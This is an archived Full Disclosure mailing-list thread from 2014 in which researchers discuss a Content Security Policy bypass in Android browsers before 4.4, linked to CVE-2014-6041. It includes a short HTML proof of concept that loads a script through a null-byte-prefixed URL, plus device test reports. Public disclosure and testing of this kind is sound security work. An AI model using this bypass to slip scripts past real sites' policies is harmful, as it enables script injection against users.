[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Fwd: Re: CSP Bypass on Android prior to 4.4

To: fulldisclosure <fulldisclosure@xxxxxxxxxxxx>, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [FD] Fwd: Re: CSP Bypass on Android prior to 4.4
From: Vitor Ventura <ventura.vitor@xxxxxxxxx>
Date: Tue, 14 Oct 2014 12:33:14 +0100

---------- Mensagem encaminhada ----------
De: "Vitor Ventura" <ventura.vitor@xxxxxxxxx>
Data: 14/10/2014 12:32
Assunto: Re: [FD] CSP Bypass on Android prior to 4.4
Para: "E Boogie" <evanjjohns@xxxxxxxxx>
Cc:

Hello,

  My testing was done on BQ aquaris 5 HD with android 4.2.1 using chrome.
It wasn't vulnerable.

Regards
VV
Em 14/10/2014 00:12, "E Boogie" <evanjjohns@xxxxxxxxx> escreveu:

> I've done a little more testing and what I've found is pretty startling.
>
> I tested on a Galaxy Note 2 running Android 4.4.2 and the CSP bypass
> worked.
>
> I also tested on an old version of Safari on an iPad (Safari/7534.48.3) and
> the CSP bypass also worked.
>
> If you are so kind, please use ejj.io/test.php to test this for me. If it
> worked, please press the "IT WORKED" button.
>
> This way I can compile a large finger print of browsers/phones/versions the
> CSP bypass worked on (based on user-agent)
>
> Evan J.
>
> On Sat, Oct 11, 2014 at 4:09 PM, E Boogie <evanjjohns@xxxxxxxxx> wrote:
>
> > I've found a Content Security Policy bypass similar and related to the
> same origin policy bypass in CVE-2014-6041.
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041
> >
> > I've tested this on an Android 4.3 tablet running a bunch of different
> browsers, including Inbrowser, Firefox, and the default Android browser on
> an emulator for Android 4.3.1.
> >
> > HTML PoC:
> >
> > <input type=button value="test" onclick="
> >   a=document.createElement('script');
> >   a.id='AA';
> >   a.src='\u0000https://js.stripe.com/v2/';
> >   document.body.appendChild(a);
> >
>  
> setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{
> alert(2);}}, 400);
> >   return false;">
> >
> >
> > The content security policy rule that should block this is
> > script-src 'self' https://js.stripe.com/v3/ ;
> >
> > The PoC worked if you see a popup containing stripes e(){} object. I set
> the Timeout kind of short, so you may have to press the button twice before
> you see the popup.
> >
> > I have a PoC test page at ejj.io/test.php
> >
> > Cheers,
> > Evan J
> >
> > --
> > Evan J Johnson
> >
> >
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

References:
- [FD] CSP Bypass on Android prior to 4.4
  - From: E Boogie
- Re: [FD] CSP Bypass on Android prior to 4.4
  - From: E Boogie

Prev by Date: Re: [FD] CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
Next by Date: [FD] two browser mem disclosure bugs (CVE-2014-1580 and CVE-something-or-other)
Previous by thread: Re: [FD] CSP Bypass on Android prior to 4.4
Next by thread: [FD] PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability
Index(es):
- Date
- Thread